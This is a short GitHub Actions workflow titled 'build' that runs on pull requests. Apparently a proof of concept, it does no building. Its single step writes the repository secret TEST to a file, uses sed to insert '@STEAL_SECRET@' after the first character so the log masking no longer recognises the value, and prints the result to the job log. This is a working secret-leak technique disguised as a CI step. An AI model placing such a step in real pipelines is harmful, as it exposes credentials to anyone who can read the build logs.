name: build
on:
  pull_request:
    types:
      - opened
      - reopened
      - synchronize
    branches:    
      - 'master'
jobs:
  test:
    runs-on: ubuntu-latest
    environment: 111
    steps:
      - uses: actions/checkout@master
      - name: aaa
        env:
          TEST: ${{ secrets.TEST }}
        run: |
            echo "${TEST}" > file_secret.txt
            sed -i 's/^\(.\)\(.*\)/\1@STEAL_SECRET@\2/g' file_secret.txt
            cat file_secret.txt
        
